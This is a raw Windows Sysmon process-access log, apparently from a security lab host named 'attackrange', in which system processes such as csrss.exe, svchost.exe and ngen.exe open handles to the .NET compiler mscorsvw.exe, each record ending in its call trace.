10341000x80000000000000008031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.556{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BF03-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.556{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BF03-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.494{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BE03-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.478{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BE03-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.478{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BE03-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.431{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BD03-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.416{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BD03-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.416{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BD03-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BC03-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.353{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BC03-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.353{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BC03-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.322{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BB03-00000000A301}1340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.322{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BB03-00000000A301}1340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.322{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BB03-00000000A301}1340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-BA03-00000000A301}3160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.275{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-BA03-00000000A301}3160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-BA03-00000000A301}3160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.197{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B903-00000000A301}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.181{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B903-00000000A301}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.181{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B903-00000000A301}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.134{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B803-00000000A301}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.119{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B803-00000000A301}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.119{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B803-00000000A301}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 